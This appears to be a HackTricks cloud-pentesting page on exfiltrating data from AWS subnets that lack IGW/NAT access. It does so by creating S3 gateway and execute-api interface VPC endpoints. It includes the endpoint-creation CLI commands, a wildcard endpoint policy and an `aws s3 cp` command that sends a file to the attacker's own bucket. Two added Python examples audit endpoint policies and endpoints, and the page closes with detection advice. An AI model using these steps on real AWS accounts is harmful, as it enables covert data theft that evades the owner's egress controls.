AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Summary

This technique abuses VPC Endpoints to create exfiltration channels from subnets that have no Internet Gateway (IGW) or NAT Gateway. Gateway endpoints (only S3 and DynamoDB offer this type) add a route for the service's AWS-managed prefix list to the route tables you select; Interface endpoints (execute-api, secretsmanager, ssm, sts, etc.) create ENIs with private IPs in the chosen subnets, protected by a security group. Traffic to either kind of endpoint stays on the AWS network and never crosses the IGW/NAT or any egress proxy or firewall placed behind them, so an attacker with a handful of EC2/VPC permissions (ec2:CreateVpcEndpoint plus the ability to choose route tables, subnets and a security group) can open a controlled egress path from an otherwise isolated subnet.

Prereqs: an existing VPC with private subnets (no IGW/NAT route in their route tables). You need permission to create VPC endpoints (ec2:CreateVpcEndpoint plus the ec2:Describe* calls used below) and, for Option B, a security group to attach to the endpoint ENIs. Private DNS on an interface endpoint additionally requires the VPC attributes enableDnsSupport and enableDnsHostnames to be true. Endpoints are regional: the S3 bucket or Private API you target must live in the same region as the endpoint.

Option A – S3 Gateway VPC Endpoint

Variables

  • REGION=us-east-1
  • VPC_ID=<target vpc>
  • RTB_IDS=<space-separated route table IDs of the private subnets (the CLI splits list arguments on whitespace, not commas)>

  1. Create a permissive endpoint policy file (optional: an endpoint created without --policy-document gets a default policy that already allows full access, so this step only makes the grant explicit). Endpoint policies are resource policies and therefore need a Principal element. Save as allow-put-get-any-s3.json:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:*"],
      "Resource": ["*"]
    }
  ]
}
```
  2. Create the S3 Gateway endpoint (adds the S3 prefix‑list route to the selected route tables):

```bash
aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.s3 \
  --vpc-endpoint-type Gateway \
  --route-table-ids $RTB_IDS \
  --policy-document file://allow-put-get-any-s3.json   # optional
```

Evidence to capture:

  • aws ec2 describe-route-tables --route-table-ids $RTB_IDS shows a route to the AWS S3 prefix list (DestinationPrefixListId=pl-..., GatewayId=vpce-...), and aws ec2 describe-vpc-endpoints --vpc-endpoint-ids <vpce-id> shows State=available.
  • From an instance in those subnets (with IAM credentials allowed to write to the bucket) you can exfil to S3 without any Internet path. The bucket can belong to any account unless the endpoint policy restricts it (e.g., with aws:ResourceAccount / aws:ResourceOrgID conditions), but it must be in the same region as the endpoint:

```bash
# On the isolated instance (e.g., via SSM):
echo data > /tmp/x.txt
aws s3 cp /tmp/x.txt s3://<your-bucket>/egress-test/x.txt --region $REGION
```
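The endpoint policy (or its absence) is the control that decides whether Option A works as an exfil path, because the endpoint proxies any S3 request its policy allows, including requests to buckets in accounts the victim does not own. The following is an added example, not code from the page: a small Python evaluator run against two constructed endpoint policies, the page's permissive one and a hardened variant that pins aws:ResourceAccount and aws:PrincipalOrgID (the account and org IDs are placeholders). It implements only the subset of IAM semantics needed here (explicit Deny wins, glob matching on Action/Resource, StringEquals/StringNotEquals conditions).

```python
import fnmatch

# Constructed example policies. The first is the page's allow-put-get-any-s3.json
# (with the Principal element endpoint policies require); it is also equivalent to
# the default policy applied when --policy-document is omitted.
PERMISSIVE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": ["s3:*"], "Resource": ["*"]}
    ],
}

# Constructed hardened policy: the endpoint only proxies requests whose target bucket
# is owned by an allow-listed account AND whose caller belongs to the organisation.
# The account ID and org ID are placeholders (assumption), not values from the page.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": "*",
            "Condition": {
                "StringEquals": {
                    "aws:ResourceAccount": ["111111111111"],
                    "aws:PrincipalOrgID": ["o-exampleorgid"],
                }
            },
        }
    ],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _condition_matches(condition, context):
    """Minimal evaluator: only StringEquals / StringNotEquals are supported."""
    for operator, pairs in condition.items():
        if operator not in ("StringEquals", "StringNotEquals"):
            raise NotImplementedError(operator)
        for key, allowed in pairs.items():
            actual = context.get(key)
            hit = actual is not None and actual in _as_list(allowed)
            if operator == "StringEquals" and not hit:
                return False  # missing key also fails StringEquals
            if operator == "StringNotEquals" and hit:
                return False
    return True


def endpoint_allows(policy, action, resource_arn, context):
    """Simplified IAM evaluation: an explicit Deny wins, otherwise any matching Allow.

    `context` carries the request-context keys the conditions look at, e.g.
    {"aws:ResourceAccount": "999999999999", "aws:PrincipalOrgID": "o-exampleorgid"}.
    """
    allowed = False
    for stmt in policy["Statement"]:
        action_hit = any(fnmatch.fnmatch(action.lower(), a.lower()) for a in _as_list(stmt["Action"]))
        resource_hit = any(fnmatch.fnmatch(resource_arn, r) for r in _as_list(stmt["Resource"]))
        if not (action_hit and resource_hit):
            continue
        if not _condition_matches(stmt.get("Condition", {}), context):
            continue
        if stmt["Effect"] == "Deny":
            return False
        allowed = True
    return allowed


def exfil_possible(policy, victim_org="o-exampleorgid", attacker_account="999999999999"):
    """True if a victim-org principal can PutObject into a bucket owned by a foreign account."""
    return endpoint_allows(
        policy,
        "s3:PutObject",
        "arn:aws:s3:::attacker-bucket/egress-test/x.txt",  # constructed target
        {"aws:ResourceAccount": attacker_account, "aws:PrincipalOrgID": victim_org},
    )


if __name__ == "__main__":
    for name, pol in (("permissive", PERMISSIVE_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"{name}: cross-account PutObject via endpoint -> {exfil_possible(pol)}")
```

The hardened policy still lets org principals reach the organisation's own buckets, which is the usual reason a gateway endpoint exists; what it removes is the attacker-owned destination the technique depends on. To audit a live endpoint, feed the PolicyDocument string returned by describe-vpc-endpoints (json.loads) into exfil_possible.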

Option B – Interface VPC Endpoint for API Gateway (execute-api)

Variables

  • REGION=us-east-1
  • VPC_ID=<target vpc>
  • SUBNET_IDS=<space-separated private subnet IDs (one per AZ you need an ENI in)>
  • SG_VPCE=<security group for the endpoint ENIs allowing inbound 443 from the target instances>

  1. Create the interface endpoint and attach the SG:

```bash
aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.execute-api \
  --vpc-endpoint-type Interface \
  --subnet-ids $SUBNET_IDS \
  --security-group-ids $SG_VPCE \
  --private-dns-enabled
```

With --private-dns-enabled, *.execute-api.$REGION.amazonaws.com resolves inside the VPC to the endpoint ENIs, so clients need no changes; a known side effect is that public (Regional/edge-optimized) APIs can no longer be reached from that VPC by their default hostname, which may be noticed. Without private DNS, call the endpoint-specific hostname (vpce-....execute-api.$REGION.vpce.amazonaws.com) and pass the API ID in the x-apigw-api-id header or as the Host header.

Evidence to capture:

  • aws ec2 describe-vpc-endpoints --vpc-endpoint-ids <vpce-id> shows State=available with NetworkInterfaceIds (ENIs in your subnets) and PrivateDnsEnabled=true.
  • Instances in those subnets can reach Private API Gateway APIs through those ENIs (no Internet path required). The API's resource policy must allow the caller, typically with an aws:SourceVpce condition naming this endpoint; since that policy is written by the API owner, the target API can live in the attacker's own account, giving an HTTPS exfil/C2 channel that never touches the IGW/NAT.
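The evidence from both options can be gathered in one audit pass. The following is an added example, not the page's own tooling: pure-Python logic over constructed (trimmed) describe-route-tables / describe-vpc-endpoints output that flags gateway and interface endpoints reachable from route tables with no IGW/NAT route. The IDs are made up for the example; the assumed production use is feeding it the boto3 responses of ec2.describe_route_tables() and ec2.describe_vpc_endpoints(), which have the same shape.

```python
# Constructed sample data (trimmed shapes of describe-route-tables / describe-vpc-endpoints).
ROUTE_TABLES = {
    "RouteTables": [
        {
            "RouteTableId": "rtb-0private",
            "VpcId": "vpc-0example",
            "Associations": [
                {"RouteTableId": "rtb-0private", "SubnetId": "subnet-0a", "Main": False},
                {"RouteTableId": "rtb-0private", "SubnetId": "subnet-0b", "Main": False},
            ],
            "Routes": [
                {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
                # Route added by the S3 Gateway endpoint: prefix list -> vpce-...
                {"DestinationPrefixListId": "pl-0example", "GatewayId": "vpce-0s3gw", "State": "active"},
            ],
        },
        {
            "RouteTableId": "rtb-0main",
            "VpcId": "vpc-0example",
            "Associations": [{"RouteTableId": "rtb-0main", "Main": True}],
            "Routes": [
                {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
                {"DestinationCidrBlock": "0.0.0.0/0", "GatewayId": "igw-0example", "State": "active"},
            ],
        },
    ]
}

ENDPOINTS = {
    "VpcEndpoints": [
        {"VpcEndpointId": "vpce-0s3gw", "VpcId": "vpc-0example", "VpcEndpointType": "Gateway",
         "ServiceName": "com.amazonaws.us-east-1.s3", "State": "available",
         "RouteTableIds": ["rtb-0private"], "SubnetIds": [], "PrivateDnsEnabled": False},
        {"VpcEndpointId": "vpce-0api", "VpcId": "vpc-0example", "VpcEndpointType": "Interface",
         "ServiceName": "com.amazonaws.us-east-1.execute-api", "State": "available",
         "RouteTableIds": [], "SubnetIds": ["subnet-0a"], "PrivateDnsEnabled": True,
         "NetworkInterfaceIds": ["eni-0api"]},
        # Interface endpoint in a subnet that falls back to the main (public) route table
        {"VpcEndpointId": "vpce-0logs", "VpcId": "vpc-0example", "VpcEndpointType": "Interface",
         "ServiceName": "com.amazonaws.us-east-1.logs", "State": "available",
         "RouteTableIds": [], "SubnetIds": ["subnet-0pub"], "PrivateDnsEnabled": True,
         "NetworkInterfaceIds": ["eni-0logs"]},
    ]
}


def has_internet_route(route_table):
    """True if any active route targets an Internet Gateway or a NAT Gateway."""
    for route in route_table["Routes"]:
        if route.get("State", "active") != "active":
            continue
        if route.get("GatewayId", "").startswith("igw-") or route.get("NatGatewayId"):
            return True
    return False


def _index_route_tables(rt_response):
    """Map subnet -> route table (explicit associations) and VPC -> main route table."""
    subnet_rt, main_rt = {}, {}
    for rt in rt_response["RouteTables"]:
        for assoc in rt.get("Associations", []):
            if assoc.get("Main"):
                main_rt[rt["VpcId"]] = rt["RouteTableId"]
            elif "SubnetId" in assoc:
                subnet_rt[assoc["SubnetId"]] = rt["RouteTableId"]
    return subnet_rt, main_rt


def find_private_egress(rt_response, vpce_response):
    """Return available endpoints reachable from route tables that have no IGW/NAT route."""
    tables = {rt["RouteTableId"]: rt for rt in rt_response["RouteTables"]}
    isolated = {rid for rid, rt in tables.items() if not has_internet_route(rt)}
    subnet_rt, main_rt = _index_route_tables(rt_response)
    findings = []
    for ep in vpce_response["VpcEndpoints"]:
        if ep["State"] != "available":
            continue
        if ep["VpcEndpointType"] == "Gateway":
            hit = [rid for rid in ep["RouteTableIds"] if rid in isolated]
            # Cross-check that the prefix-list route in those tables points at this endpoint
            route_present = any(
                r.get("GatewayId") == ep["VpcEndpointId"] for rid in hit for r in tables[rid]["Routes"]
            )
        else:
            # Subnets without an explicit association use the VPC's main route table
            hit = [s for s in ep["SubnetIds"]
                   if subnet_rt.get(s, main_rt.get(ep["VpcId"])) in isolated]
            route_present = None  # interface endpoints are reached directly via their ENIs
        if hit:
            findings.append({
                "endpoint": ep["VpcEndpointId"],
                "type": ep["VpcEndpointType"],
                "service": ep["ServiceName"],
                "via": hit,
                "route_present": route_present,
                "private_dns": ep.get("PrivateDnsEnabled", False),
            })
    return findings


if __name__ == "__main__":
    for f in find_private_egress(ROUTE_TABLES, ENDPOINTS):
        print(f"{f['endpoint']} ({f['type']}, {f['service']}) reachable from isolated {f['via']}")
```

On the sample data the S3 gateway endpoint and the execute-api interface endpoint are reported, while the logs endpoint is not because its subnet inherits the main route table, which has an IGW route. Pairing each finding with the CreateVpcEndpoint event in CloudTrail tells you who opened the path and when.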

Impact

  • Bypasses perimeter egress controls (NAT/IGW-based filtering, egress proxies, firewall allow-lists) by leveraging AWS‑managed private paths to AWS services.
  • Enables data exfiltration from isolated subnets (e.g., writing to S3, calling a Private API Gateway) and access to credential and control-plane services (Secrets Manager, SSM, STS, etc.) without IGW/NAT.
  • Detection/hardening: CloudTrail records ec2:CreateVpcEndpoint / ModifyVpcEndpoint, and data-plane events that traverse an endpoint carry a vpcEndpointId field; endpoint policies with aws:ResourceAccount / aws:ResourceOrgID conditions (and SCPs restricting who may create endpoints) remove the cross-account destination the technique relies on.
